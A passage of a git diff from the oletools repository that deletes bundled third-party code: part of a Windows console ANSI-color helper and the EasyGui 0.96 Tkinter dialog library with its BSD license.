- ('dwSize', COORD),
- ('dwCursorPosition', COORD),
- ('wAttributes', ctypes.c_ushort),
- ('srWindow', SmallRECT),
- ('dwMaximumWindowSize', COORD)
- ]
-
-
-def init_kernel32(kernel32=None):
- """Load a unique instance of WinDLL into memory, set arg/return types, and get stdout/err handles.
-
- 1. Since we are setting DLL function argument types and return types, we need to maintain our own instance of
- kernel32 to prevent overriding (or being overwritten by) user's own changes to ctypes.windll.kernel32.
- 2. While we're doing all this we might as well get the handles to STDOUT and STDERR streams.
- 3. If either stream has already been replaced set return value to INVALID_HANDLE_VALUE to indicate it shouldn't be
- replaced.
-
- :raise AttributeError: When called on a non-Windows platform.
-
- :param kernel32: Optional mock kernel32 object. For testing.
-
- :return: Loaded kernel32 instance, stderr handle (int), stdout handle (int).
- :rtype: tuple
- """
- if not kernel32:
- kernel32 = ctypes.LibraryLoader(ctypes.WinDLL).kernel32 # Load our own instance. Unique memory address.
- kernel32.GetStdHandle.argtypes = [ctypes.c_ulong]
- kernel32.GetStdHandle.restype = ctypes.c_void_p
- kernel32.GetConsoleScreenBufferInfo.argtypes = [
- ctypes.c_void_p,
- ctypes.POINTER(ConsoleScreenBufferInfo),
- ]
- kernel32.GetConsoleScreenBufferInfo.restype = ctypes.c_long
-
- # Get handles.
- if hasattr(sys.stderr, '_original_stream'):
- stderr = INVALID_HANDLE_VALUE
- else:
- stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE)
- if hasattr(sys.stdout, '_original_stream'):
- stdout = INVALID_HANDLE_VALUE
- else:
- stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
-
- return kernel32, stderr, stdout
-
-
-def get_console_info(kernel32, handle):
- """Get information about this current console window.
-
- http://msdn.microsoft.com/en-us/library/windows/desktop/ms683231
- https://code.google.com/p/colorama/issues/detail?id=47
- https://bitbucket.org/pytest-dev/py/src/4617fe46/py/_io/terminalwriter.py
-
- Windows 10 Insider since around February 2016 finally introduced support for ANSI colors. No need to replace stdout
- and stderr streams to intercept colors and issue multiple SetConsoleTextAttribute() calls for these consoles.
-
- :raise OSError: When GetConsoleScreenBufferInfo or GetConsoleMode API calls fail.
-
- :param ctypes.windll.kernel32 kernel32: Loaded kernel32 instance.
- :param int handle: stderr or stdout handle.
-
- :return: Foreground and background colors (integers) as well as native ANSI support (bool).
- :rtype: tuple
- """
- # Query Win32 API.
- csbi = ConsoleScreenBufferInfo() # Populated by GetConsoleScreenBufferInfo.
- lpcsbi = ctypes.byref(csbi)
- dword = ctypes.c_ulong() # Populated by GetConsoleMode.
- lpdword = ctypes.byref(dword)
- if not kernel32.GetConsoleScreenBufferInfo(handle, lpcsbi) or not kernel32.GetConsoleMode(handle, lpdword):
- raise ctypes.WinError()
-
- # Parse data.
- # buffer_width = int(csbi.dwSize.X - 1)
- # buffer_height = int(csbi.dwSize.Y)
- # terminal_width = int(csbi.srWindow.Right - csbi.srWindow.Left)
- # terminal_height = int(csbi.srWindow.Bottom - csbi.srWindow.Top)
- fg_color = csbi.wAttributes % 16
- bg_color = csbi.wAttributes & 240
- native_ansi = bool(dword.value & ENABLE_VIRTUAL_TERMINAL_PROCESSING)
-
- return fg_color, bg_color, native_ansi
-
-
-def bg_color_native_ansi(kernel32, stderr, stdout):
- """Get background color and if console supports ANSI colors natively for both streams.
-
- :param ctypes.windll.kernel32 kernel32: Loaded kernel32 instance.
- :param int stderr: stderr handle.
- :param int stdout: stdout handle.
-
- :return: Background color (int) and native ANSI support (bool).
- :rtype: tuple
- """
- try:
- if stderr == INVALID_HANDLE_VALUE:
- raise OSError
- bg_color, native_ansi = get_console_info(kernel32, stderr)[1:]
- except OSError:
- try:
- if stdout == INVALID_HANDLE_VALUE:
- raise OSError
- bg_color, native_ansi = get_console_info(kernel32, stdout)[1:]
- except OSError:
- bg_color, native_ansi = WINDOWS_CODES['black'], False
- return bg_color, native_ansi
-
-
-class WindowsStream(object):
- """Replacement stream which overrides sys.stdout or sys.stderr. When writing or printing, ANSI codes are converted.
-
- ANSI (Linux/Unix) color codes are converted into win32 system calls, changing the next character's color before
- printing it. Resources referenced:
- https://github.com/tartley/colorama
- http://www.cplusplus.com/articles/2ywTURfi/
- http://thomasfischer.biz/python-and-windows-terminal-colors/
- http://stackoverflow.com/questions/17125440/c-win32-console-color
- http://www.tysos.org/svn/trunk/mono/corlib/System/WindowsConsoleDriver.cs
- http://stackoverflow.com/questions/287871/print-in-terminal-with-colors-using-python
- http://msdn.microsoft.com/en-us/library/windows/desktop/ms682088#_win32_character_attributes
-
- :cvar list ALL_BG_CODES: List of bg Windows codes. Used to determine if requested color is foreground or background.
- :cvar dict COMPILED_CODES: Translation dict. Keys are ANSI codes (values of BASE_CODES), values are Windows codes.
- :ivar int default_fg: Foreground Windows color code at the time of instantiation.
- :ivar int default_bg: Background Windows color code at the time of instantiation.
- """
-
- ALL_BG_CODES = [v for k, v in WINDOWS_CODES.items() if k.startswith('bg') or k.startswith('hibg')]
- COMPILED_CODES = dict((v, WINDOWS_CODES[k]) for k, v in BASE_CODES.items() if k in WINDOWS_CODES)
-
- def __init__(self, kernel32, stream_handle, original_stream):
- """Constructor.
-
- :param ctypes.windll.kernel32 kernel32: Loaded kernel32 instance.
- :param int stream_handle: stderr or stdout handle.
- :param original_stream: sys.stderr or sys.stdout before being overridden by this class' instance.
- """
- self._kernel32 = kernel32
- self._stream_handle = stream_handle
- self._original_stream = original_stream
- self.default_fg, self.default_bg = self.colors
-
- def __getattr__(self, item):
- """If an attribute/function/etc is not defined in this function, retrieve the one from the original stream.
-
- Fixes ipython arrow key presses.
- """
- return getattr(self._original_stream, item)
-
- @property
- def colors(self):
- """Return the current foreground and background colors."""
- try:
- return get_console_info(self._kernel32, self._stream_handle)[:2]
- except OSError:
- return WINDOWS_CODES['white'], WINDOWS_CODES['black']
-
- @colors.setter
- def colors(self, color_code):
- """Change the foreground and background colors for subsequently printed characters.
-
- None resets colors to their original values (when class was instantiated).
-
- Since setting a color requires including both foreground and background codes (merged), setting just the
- foreground color resets the background color to black, and vice versa.
-
- This function first gets the current background and foreground colors, merges in the requested color code, and
- sets the result.
-
- However if we need to remove just the foreground color but leave the background color the same (or vice versa)
- such as when {/red} is used, we must merge the default foreground color with the current background color. This
- is the reason for those negative values.
-
- :param int color_code: Color code from WINDOWS_CODES.
- """
- if color_code is None:
- color_code = WINDOWS_CODES['/all']
-
- # Get current color code.
- current_fg, current_bg = self.colors
-
- # Handle special negative codes. Also determine the final color code.
- if color_code == WINDOWS_CODES['/fg']:
- final_color_code = self.default_fg | current_bg # Reset the foreground only.
- elif color_code == WINDOWS_CODES['/bg']:
- final_color_code = current_fg | self.default_bg # Reset the background only.
- elif color_code == WINDOWS_CODES['/all']:
- final_color_code = self.default_fg | self.default_bg # Reset both.
- elif color_code == WINDOWS_CODES['bgblack']:
- final_color_code = current_fg # Black background.
- else:
- new_is_bg = color_code in self.ALL_BG_CODES
- final_color_code = color_code | (current_fg if new_is_bg else current_bg)
-
- # Set new code.
- self._kernel32.SetConsoleTextAttribute(self._stream_handle, final_color_code)
-
- def write(self, p_str):
- """Write to stream.
-
- :param str p_str: string to print.
- """
- for segment in RE_SPLIT.split(p_str):
- if not segment:
- # Empty string. p_str probably starts with colors so the first item is always ''.
- continue
- if not RE_SPLIT.match(segment):
- # No color codes, print regular text.
- print(segment, file=self._original_stream, end='')
- self._original_stream.flush()
- continue
- for color_code in (int(c) for c in RE_NUMBER_SEARCH.findall(segment)[0].split(';')):
- if color_code in self.COMPILED_CODES:
- self.colors = self.COMPILED_CODES[color_code]
-
-
-class Windows(object):
- """Enable and disable Windows support for ANSI color character codes.
-
- Call static method Windows.enable() to enable color support for the remainder of the process' lifetime.
-
- This class is also a context manager. You can do this:
- with Windows():
- print(Color('{autored}Test{/autored}'))
-
- Or this:
- with Windows(auto_colors=True):
- print(Color('{autored}Test{/autored}'))
- """
-
- @classmethod
- def disable(cls):
- """Restore sys.stderr and sys.stdout to their original objects. Resets colors to their original values.
-
- :return: If streams restored successfully.
- :rtype: bool
- """
- # Skip if not on Windows.
- if not IS_WINDOWS:
- return False
-
- # Restore default colors.
- if hasattr(sys.stderr, '_original_stream'):
- getattr(sys, 'stderr').color = None
- if hasattr(sys.stdout, '_original_stream'):
- getattr(sys, 'stdout').color = None
-
- # Restore original streams.
- changed = False
- if hasattr(sys.stderr, '_original_stream'):
- changed = True
- sys.stderr = getattr(sys.stderr, '_original_stream')
- if hasattr(sys.stdout, '_original_stream'):
- changed = True
- sys.stdout = getattr(sys.stdout, '_original_stream')
-
- return changed
-
- @staticmethod
- def is_enabled():
- """Return True if either stderr or stdout has colors enabled."""
- return hasattr(sys.stderr, '_original_stream') or hasattr(sys.stdout, '_original_stream')
-
- @classmethod
- def enable(cls, auto_colors=False, reset_atexit=False):
- """Enable color text with print() or sys.stdout.write() (stderr too).
-
- :param bool auto_colors: Automatically selects dark or light colors based on current terminal's background
- color. Only works with {autored} and related tags.
- :param bool reset_atexit: Resets original colors upon Python exit (in case you forget to reset it yourself with
- a closing tag). Does nothing on native ANSI consoles.
-
- :return: If streams replaced successfully.
- :rtype: bool
- """
- if not IS_WINDOWS:
- return False # Windows only.
-
- # Get values from init_kernel32().
- kernel32, stderr, stdout = init_kernel32()
- if stderr == INVALID_HANDLE_VALUE and stdout == INVALID_HANDLE_VALUE:
- return False # No valid handles, nothing to do.
-
- # Get console info.
- bg_color, native_ansi = bg_color_native_ansi(kernel32, stderr, stdout)
-
- # Set auto colors:
- if auto_colors:
- if bg_color in (112, 96, 240, 176, 224, 208, 160):
- ANSICodeMapping.set_light_background()
- else:
- ANSICodeMapping.set_dark_background()
-
- # Don't replace streams if ANSI codes are natively supported.
- if native_ansi:
- return False
-
- # Reset on exit if requested.
- if reset_atexit:
- atexit.register(cls.disable)
-
- # Overwrite stream references.
- if stderr != INVALID_HANDLE_VALUE:
- sys.stderr.flush()
- sys.stderr = WindowsStream(kernel32, stderr, sys.stderr)
- if stdout != INVALID_HANDLE_VALUE:
- sys.stdout.flush()
- sys.stdout = WindowsStream(kernel32, stdout, sys.stdout)
-
- return True
-
- def __init__(self, auto_colors=False):
- """Constructor."""
- self.auto_colors = auto_colors
-
- def __enter__(self):
- """Context manager, enables colors on Windows."""
- self.enable(auto_colors=self.auto_colors)
-
- def __exit__(self, *_):
- """Context manager, disabled colors on Windows."""
- self.disable()
diff --git a/oletools/thirdparty/easygui/LICENSE.txt b/oletools/thirdparty/easygui/LICENSE.txt
deleted file mode 100644
index b04511b6..00000000
--- a/oletools/thirdparty/easygui/LICENSE.txt
+++ /dev/null
@@ -1,32 +0,0 @@
-LICENSE INFORMATION
-
-EasyGui version 0.96
-
-Copyright (c) 2010, Stephen Raymond Ferg
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- 1. Redistributions of source code must retain the above copyright notice,
- this list of conditions and the following disclaimer.
-
- 2. Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation and/or
- other materials provided with the distribution.
-
- 3. The name of the author may not be used to endorse or promote products derived
- from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
-INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
-IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
-EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/oletools/thirdparty/easygui/easygui.py b/oletools/thirdparty/easygui/easygui.py
deleted file mode 100644
index 016ffd59..00000000
--- a/oletools/thirdparty/easygui/easygui.py
+++ /dev/null
@@ -1,2492 +0,0 @@
-"""
-@version: 0.96(2010-08-29)
-
-@note:
-ABOUT EASYGUI
-
-EasyGui provides an easy-to-use interface for simple GUI interaction
-with a user. It does not require the programmer to know anything about
-tkinter, frames, widgets, callbacks or lambda. All GUI interactions are
-invoked by simple function calls that return results.
-
-@note:
-WARNING about using EasyGui with IDLE
-
-You may encounter problems using IDLE to run programs that use EasyGui. Try it
-and find out. EasyGui is a collection of Tkinter routines that run their own
-event loops. IDLE is also a Tkinter application, with its own event loop. The
-two may conflict, with unpredictable results. If you find that you have
-problems, try running your EasyGui program outside of IDLE.
-
-Note that EasyGui requires Tk release 8.0 or greater.
-
-@note:
-LICENSE INFORMATION
-
-EasyGui version 0.96
-
-Copyright (c) 2010, Stephen Raymond Ferg
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- 1. Redistributions of source code must retain the above copyright notice,
- this list of conditions and the following disclaimer.
-
- 2. Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation and/or
- other materials provided with the distribution.
-
- 3. The name of the author may not be used to endorse or promote products derived
- from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
-INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
-IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
-EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-@note:
-ABOUT THE EASYGUI LICENSE
-
-This license is what is generally known as the "modified BSD license",
-aka "revised BSD", "new BSD", "3-clause BSD".
-See http://www.opensource.org/licenses/bsd-license.php
-
-This license is GPL-compatible.
-See http://en.wikipedia.org/wiki/License_compatibility
-See http://www.gnu.org/licenses/license-list.html#GPLCompatibleLicenses
-
-The BSD License is less restrictive than GPL.
-It allows software released under the license to be incorporated into proprietary products.
-Works based on the software may be released under a proprietary license or as closed source software.
-http://en.wikipedia.org/wiki/BSD_licenses#3-clause_license_.28.22New_BSD_License.22.29
-
-"""
-egversion = __doc__.split()[1]
-
-__all__ = ['ynbox'
- , 'ccbox'
- , 'boolbox'
- , 'indexbox'
- , 'msgbox'
- , 'buttonbox'
- , 'integerbox'
- , 'multenterbox'
- , 'enterbox'
- , 'exceptionbox'
- , 'choicebox'
- , 'codebox'
- , 'textbox'
- , 'diropenbox'
- , 'fileopenbox'
- , 'filesavebox'
- , 'passwordbox'
- , 'multpasswordbox'
- , 'multchoicebox'
- , 'abouteasygui'
- , 'egversion'
- , 'egdemo'
- , 'EgStore'
- ]
-
-import sys, os
-import string
-import pickle
-import traceback
-
-
-#--------------------------------------------------
-# check python version and take appropriate action
-#--------------------------------------------------
-"""
-From the python documentation:
-
-sys.hexversion contains the version number encoded as a single integer. This is
-guaranteed to increase with each version, including proper support for non-
-production releases. For example, to test that the Python interpreter is at
-least version 1.5.2, use:
-
-if sys.hexversion >= 0x010502F0:
- # use some advanced feature
- ...
-else:
- # use an alternative implementation or warn the user
- ...
-"""
-
-
-if sys.hexversion >= 0x020600F0:
- runningPython26 = True
-else:
- runningPython26 = False
-
-if sys.hexversion >= 0x030000F0:
- runningPython3 = True
-else:
- runningPython3 = False
-
-try:
- from PIL import Image as PILImage
- from PIL import ImageTk as PILImageTk
- PILisLoaded = True
-except:
- PILisLoaded = False
-
-
-if runningPython3:
- from tkinter import *
- import tkinter.filedialog as tk_FileDialog
- from io import StringIO
-else:
- from Tkinter import *
- import tkFileDialog as tk_FileDialog
- from StringIO import StringIO
-
-def write(*args):
- args = [str(arg) for arg in args]
- args = " ".join(args)
- sys.stdout.write(args)
-
-def writeln(*args):
- write(*args)
- sys.stdout.write("\n")
-
-say = writeln
-
-
-if TkVersion < 8.0 :
- stars = "*"*75
- writeln("""\n\n\n""" + stars + """
-You are running Tk version: """ + str(TkVersion) + """
-You must be using Tk version 8.0 or greater to use EasyGui.
-Terminating.
-""" + stars + """\n\n\n""")
- sys.exit(0)
-
-def dq(s):
- return '"%s"' % s
-
-rootWindowPosition = "+300+200"
-
-PROPORTIONAL_FONT_FAMILY = ("MS", "Sans", "Serif")
-MONOSPACE_FONT_FAMILY = ("Courier")
-
-PROPORTIONAL_FONT_SIZE = 10
-MONOSPACE_FONT_SIZE = 9 #a little smaller, because it it more legible at a smaller size
-TEXT_ENTRY_FONT_SIZE = 12 # a little larger makes it easier to see
-
-#STANDARD_SELECTION_EVENTS = ["Return", "Button-1"]
-STANDARD_SELECTION_EVENTS = ["Return", "Button-1", "space"]
-
-# Initialize some global variables that will be reset later
-__choiceboxMultipleSelect = None
-__widgetTexts = None
-__replyButtonText = None
-__choiceboxResults = None
-__firstWidget = None
-__enterboxText = None
-__enterboxDefaultText=""
-__multenterboxText = ""
-choiceboxChoices = None
-choiceboxWidget = None
-entryWidget = None
-boxRoot = None
-ImageErrorMsg = (
- "\n\n---------------------------------------------\n"
- "Error: %s\n%s")
-#-------------------------------------------------------------------
-# various boxes built on top of the basic buttonbox
-#-----------------------------------------------------------------------
-
-#-----------------------------------------------------------------------
-# ynbox
-#-----------------------------------------------------------------------
-def ynbox(msg="Shall I continue?"
- , title=" "
- , choices=("Yes", "No")
- , image=None
- ):
- """
- Display a msgbox with choices of Yes and No.
-
- The default is "Yes".
-
- The returned value is calculated this way::
- if the first choice ("Yes") is chosen, or if the dialog is cancelled:
- return 1
- else:
- return 0
-
- If invoked without a msg argument, displays a generic request for a confirmation
- that the user wishes to continue. So it can be used this way::
- if ynbox(): pass # continue
- else: sys.exit(0) # exit the program
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- return boolbox(msg, title, choices, image=image)
-
-
-#-----------------------------------------------------------------------
-# ccbox
-#-----------------------------------------------------------------------
-def ccbox(msg="Shall I continue?"
- , title=" "
- , choices=("Continue", "Cancel")
- , image=None
- ):
- """
- Display a msgbox with choices of Continue and Cancel.
-
- The default is "Continue".
-
- The returned value is calculated this way::
- if the first choice ("Continue") is chosen, or if the dialog is cancelled:
- return 1
- else:
- return 0
-
- If invoked without a msg argument, displays a generic request for a confirmation
- that the user wishes to continue. So it can be used this way::
-
- if ccbox():
- pass # continue
- else:
- sys.exit(0) # exit the program
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- return boolbox(msg, title, choices, image=image)
-
-
-#-----------------------------------------------------------------------
-# boolbox
-#-----------------------------------------------------------------------
-def boolbox(msg="Shall I continue?"
- , title=" "
- , choices=("Yes","No")
- , image=None
- ):
- """
- Display a boolean msgbox.
-
- The default is the first choice.
-
- The returned value is calculated this way::
- if the first choice is chosen, or if the dialog is cancelled:
- returns 1
- else:
- returns 0
- """
- reply = buttonbox(msg=msg, choices=choices, title=title, image=image)
- if reply == choices[0]: return 1
- else: return 0
-
-
-#-----------------------------------------------------------------------
-# indexbox
-#-----------------------------------------------------------------------
-def indexbox(msg="Shall I continue?"
- , title=" "
- , choices=("Yes","No")
- , image=None
- ):
- """
- Display a buttonbox with the specified choices.
- Return the index of the choice selected.
- """
- reply = buttonbox(msg=msg, choices=choices, title=title, image=image)
- index = -1
- for choice in choices:
- index = index + 1
- if reply == choice: return index
- raise AssertionError(
- "There is a program logic error in the EasyGui code for indexbox.")
-
-
-#-----------------------------------------------------------------------
-# msgbox
-#-----------------------------------------------------------------------
-def msgbox(msg="(Your message goes here)", title=" ", ok_button="OK",image=None,root=None):
- """
- Display a messagebox
- """
- if type(ok_button) != type("OK"):
- raise AssertionError("The 'ok_button' argument to msgbox must be a string.")
-
- return buttonbox(msg=msg, title=title, choices=[ok_button], image=image,root=root)
-
-
-#-------------------------------------------------------------------
-# buttonbox
-#-------------------------------------------------------------------
-def buttonbox(msg="",title=" "
- ,choices=("Button1", "Button2", "Button3")
- , image=None
- , root=None
- ):
- """
- Display a msg, a title, and a set of buttons.
- The buttons are defined by the members of the choices list.
- Return the text of the button that the user selected.
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- global boxRoot, __replyButtonText, __widgetTexts, buttonsFrame
-
-
- # Initialize __replyButtonText to the first choice.
- # This is what will be used if the window is closed by the close button.
- __replyButtonText = choices[0]
-
- if root:
- root.withdraw()
- boxRoot = Toplevel(master=root)
- boxRoot.withdraw()
- else:
- boxRoot = Tk()
- boxRoot.withdraw()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- boxRoot.geometry(rootWindowPosition)
- boxRoot.minsize(400, 100)
-
- # ------------- define the messageFrame ---------------------------------
- messageFrame = Frame(master=boxRoot)
- messageFrame.pack(side=TOP, fill=BOTH)
-
- # ------------- define the imageFrame ---------------------------------
- tk_Image = None
- if image:
- imageFilename = os.path.normpath(image)
- junk,ext = os.path.splitext(imageFilename)
-
- if os.path.exists(imageFilename):
- if ext.lower() in [".gif", ".pgm", ".ppm"]:
- tk_Image = PhotoImage(master=boxRoot, file=imageFilename)
- else:
- if PILisLoaded:
- try:
- pil_Image = PILImage.open(imageFilename)
- tk_Image = PILImageTk.PhotoImage(pil_Image, master=boxRoot)
- except:
- msg += ImageErrorMsg % (imageFilename,
- "\nThe Python Imaging Library (PIL) could not convert this file to a displayable image."
- "\n\nPIL reports:\n" + exception_format())
-
- else: # PIL is not loaded
- msg += ImageErrorMsg % (imageFilename,
- "\nI could not import the Python Imaging Library (PIL) to display the image.\n\n"
- "You may need to install PIL\n"
- "(http://www.pythonware.com/products/pil/)\n"
- "to display " + ext + " image files.")
-
- else:
- msg += ImageErrorMsg % (imageFilename, "\nImage file not found.")
-
- if tk_Image:
- imageFrame = Frame(master=boxRoot)
- imageFrame.pack(side=TOP, fill=BOTH)
- label = Label(imageFrame,image=tk_Image)
- label.image = tk_Image # keep a reference!
- label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
-
- # ------------- define the buttonsFrame ---------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=TOP, fill=BOTH)
-
- # -------------------- place the widgets in the frames -----------------------
- messageWidget = Message(messageFrame, text=msg, width=400)
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
-
- __put_buttons_in_buttonframe(choices)
-
- # -------------- the action begins -----------
- # put the focus on the first button
- __firstWidget.focus_force()
-
- boxRoot.deiconify()
- boxRoot.mainloop()
- boxRoot.destroy()
- if root: root.deiconify()
- return __replyButtonText
-
-
-#-------------------------------------------------------------------
-# integerbox
-#-------------------------------------------------------------------
-def integerbox(msg=""
- , title=" "
- , default=""
- , lowerbound=0
- , upperbound=99
- , image = None
- , root = None
- , **invalidKeywordArguments
- ):
- """
- Show a box in which a user can enter an integer.
-
- In addition to arguments for msg and title, this function accepts
- integer arguments for "default", "lowerbound", and "upperbound".
-
- The default argument may be None.
-
- When the user enters some text, the text is checked to verify that it
- can be converted to an integer between the lowerbound and upperbound.
-
- If it can be, the integer (not the text) is returned.
-
- If it cannot, then an error msg is displayed, and the integerbox is
- redisplayed.
-
- If the user cancels the operation, None is returned.
-
- NOTE that the "argLowerBound" and "argUpperBound" arguments are no longer
- supported. They have been replaced by "upperbound" and "lowerbound".
- """
- if "argLowerBound" in invalidKeywordArguments:
- raise AssertionError(
- "\nintegerbox no longer supports the 'argLowerBound' argument.\n"
- + "Use 'lowerbound' instead.\n\n")
- if "argUpperBound" in invalidKeywordArguments:
- raise AssertionError(
- "\nintegerbox no longer supports the 'argUpperBound' argument.\n"
- + "Use 'upperbound' instead.\n\n")
-
- if default != "":
- if type(default) != type(1):
- raise AssertionError(
- "integerbox received a non-integer value for "
- + "default of " + dq(str(default)) , "Error")
-
- if type(lowerbound) != type(1):
- raise AssertionError(
- "integerbox received a non-integer value for "
- + "lowerbound of " + dq(str(lowerbound)) , "Error")
-
- if type(upperbound) != type(1):
- raise AssertionError(
- "integerbox received a non-integer value for "
- + "upperbound of " + dq(str(upperbound)) , "Error")
-
- if msg == "":
- msg = ("Enter an integer between " + str(lowerbound)
- + " and "
- + str(upperbound)
- )
-
- while 1:
- reply = enterbox(msg, title, str(default), image=image, root=root)
- if reply == None: return None
-
- try:
- reply = int(reply)
- except:
- msgbox ("The value that you entered:\n\t%s\nis not an integer." % dq(str(reply))
- , "Error")
- continue
-
- if reply < lowerbound:
- msgbox ("The value that you entered is less than the lower bound of "
- + str(lowerbound) + ".", "Error")
- continue
-
- if reply > upperbound:
- msgbox ("The value that you entered is greater than the upper bound of "
- + str(upperbound) + ".", "Error")
- continue
-
- # reply has passed all validation checks.
- # It is an integer between the specified bounds.
- return reply
-
-#-------------------------------------------------------------------
-# multenterbox
-#-------------------------------------------------------------------
-def multenterbox(msg="Fill in values for the fields."
- , title=" "
- , fields=()
- , values=()
- ):
- r"""
- Show screen with multiple data entry fields.
-
- If there are fewer values than names, the list of values is padded with
- empty strings until the number of values is the same as the number of names.
-
- If there are more values than names, the list of values
- is truncated so that there are as many values as names.
-
- Returns a list of the values of the fields,
- or None if the user cancels the operation.
-
- Here is some example code, that shows how values returned from
- multenterbox can be checked for validity before they are accepted::
- ----------------------------------------------------------------------
- msg = "Enter your personal information"
- title = "Credit Card Application"
- fieldNames = ["Name","Street Address","City","State","ZipCode"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multenterbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg += ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "":
- break # no problems found
- fieldValues = multenterbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
- ----------------------------------------------------------------------
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg fields: a list of fieldnames.
- @arg values: a list of field values
- """
- return __multfillablebox(msg,title,fields,values,None)
-
-
-#-----------------------------------------------------------------------
-# multpasswordbox
-#-----------------------------------------------------------------------
-def multpasswordbox(msg="Fill in values for the fields."
- , title=" "
- , fields=tuple()
- ,values=tuple()
- ):
- r"""
- Same interface as multenterbox. But in multpassword box,
- the last of the fields is assumed to be a password, and
- is masked with asterisks.
-
- Example
- =======
-
- Here is some example code, that shows how values returned from
- multpasswordbox can be checked for validity before they are accepted::
- msg = "Enter logon information"
- title = "Demo of multpasswordbox"
- fieldNames = ["Server ID", "User ID", "Password"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multpasswordbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg = errmsg + ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "": break # no problems found
- fieldValues = multpasswordbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
- """
- return __multfillablebox(msg,title,fields,values,"*")
-
-def bindArrows(widget):
- widget.bind("", tabRight)
- widget.bind("" , tabLeft)
-
- widget.bind("",tabRight)
- widget.bind("" , tabLeft)
-
-def tabRight(event):
- boxRoot.event_generate("")
-
-def tabLeft(event):
- boxRoot.event_generate("")
-
-#-----------------------------------------------------------------------
-# __multfillablebox
-#-----------------------------------------------------------------------
-def __multfillablebox(msg="Fill in values for the fields."
- , title=" "
- , fields=()
- , values=()
- , mask = None
- ):
- global boxRoot, __multenterboxText, __multenterboxDefaultText, cancelButton, entryWidget, okButton
-
- choices = ["OK", "Cancel"]
- if len(fields) == 0: return None
-
- fields = list(fields[:]) # convert possible tuples to a list
- values = list(values[:]) # convert possible tuples to a list
-
- if len(values) == len(fields): pass
- elif len(values) > len(fields):
- fields = fields[0:len(values)]
- else:
- while len(values) < len(fields):
- values.append("")
-
- boxRoot = Tk()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- boxRoot.geometry(rootWindowPosition)
- boxRoot.bind("", __multenterboxCancel)
-
- # -------------------- put subframes in the boxRoot --------------------
- messageFrame = Frame(master=boxRoot)
- messageFrame.pack(side=TOP, fill=BOTH)
-
- #-------------------- the msg widget ----------------------------
- messageWidget = Message(messageFrame, width="4.5i", text=msg)
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
-
